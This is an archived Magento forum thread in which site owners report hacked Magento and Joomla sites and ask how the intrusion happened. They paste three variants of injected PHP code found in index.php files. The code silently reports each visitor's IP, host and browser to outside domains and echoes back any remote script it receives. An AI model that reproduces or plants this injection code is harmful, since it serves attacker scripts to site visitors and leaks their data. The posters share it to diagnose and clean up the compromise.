Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

Security Issue (possible hack)
 
lisandroc
Jr. Member
 
Total Posts:  10
Joined:  2010-02-10
 

Dear sirs, i hope anyone of you can give us an answer for this problemm

We’re experiencing a strange issue in a couple of stores and we dont know what is happening

The problem start when we see that every javascript on the store fails, and nobody can buy, because javascript reports many errors on many files.

We saw that many js files contained on js folder were modied and for some unknown reason our index.php files are laso modified with this portion of code appended at the end of the file.

#47c179#
error_reporting(0); ini_set(’display_errors’,0); $wp_kw972 = @$_SERVER[’HTTP_USER_AGENT’];
if ( preg_match (’/Gecko|MSIE/i’, $wp_kw972)){
$wp_kw09972="http://”."html”."-href”.”.com/href”."/?ip=”.$_SERVER[’REMOTE_ADDR’]."&referer;=”.urlencode($_SERVER[’HTTP_HOST’])."&ua;=".urlencode($wp_kw972);
echo $wp_kw09972;
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_kw09972);
curl_setopt ($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_972kw = curl_exec ($ch); curl_close($ch); //}
if ( substr($wp_972kw,1,3) === ‘scr’ ){
echo $wp_972kw;
}
#/47c179#

It seems that this command is sending info to this site: http://html-href.com/href from china (hack??)

Solution: We restored every original index.php file and all the files contained on /js folder but.... it happens again.

Now we have changed every password and we dont know if it’s goin to happen again but we think that it could be caused by a plugin but we dont know

 
Magento Community Magento Community
Magento Community
Magento Community
 
magestyx
Jr. Member
 
Total Posts:  1
Joined:  2014-01-06
 

Did you get this issue solved?

I\’m asking since yesterday we had 3 Joomla sites hacked with this similar code, although there were two different domains from what yours was being directed to.  I\’m searching all I can to find out how they got in - we have our Joomla sites locked down really tight so this is a huge surprise.

All the domains are from China, and we found the code in the Joomla template index.php files.

I\’ll post the code below.  Any info on this would be hugely appreciated.  We\’ve looked all day so far and haven\’t found any trace of how they might\’ve done this.

Thanks,

Magestyx

=================
#12220e#
error_reporting(0); ini_set(\’display_errors\’,0); $wp_l3 = @$_SERVER[\’HTTP_USER_AGENT\’];
if (( preg_match (\’/Gecko|MSIE/i\’, $wp_l3) && !preg_match (\’/bot/i\’, $wp_l3))){
$wp_l093=\"http://\”.\"tags\”.\"value\”.\”.com/value\”.\"/?ip=\”.$_SERVER[\’REMOTE_ADDR\’].\"&referer;=\”.urlencode($_SERVER[\’HTTP_HOST\’]).\"&ua;=\".urlencode($wp_l3);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_l093);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_3l = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_3l,1,3) === \’scr\’ ){ echo $wp_3l; }
#/12220e#
-------------------------
#3c4fb6#
error_reporting(0); ini_set(\’display_errors\’,0); $wp_wzf80861 = @$_SERVER[\’HTTP_USER_AGENT\’];
if (( preg_match (\’/Gecko|MSIE/i\’, $wp_wzf80861) && !preg_match (\’/bot/i\’, $wp_wzf80861))){
$wp_wzf0980861=\"http://\”.\"template\”.\"class\”.\”.com/class\”.\"/?ip=\”.$_SERVER[\’REMOTE_ADDR\’].\"&referer;=\”.urlencode($_SERVER[\’HTTP_HOST\’]).\"&ua;=\".urlencode($wp_wzf80861);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wzf0980861);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_80861wzf = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_80861wzf,1,3) === \’scr\’ ){ echo $wp_80861wzf; }
#/3c4fb6#
=================

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top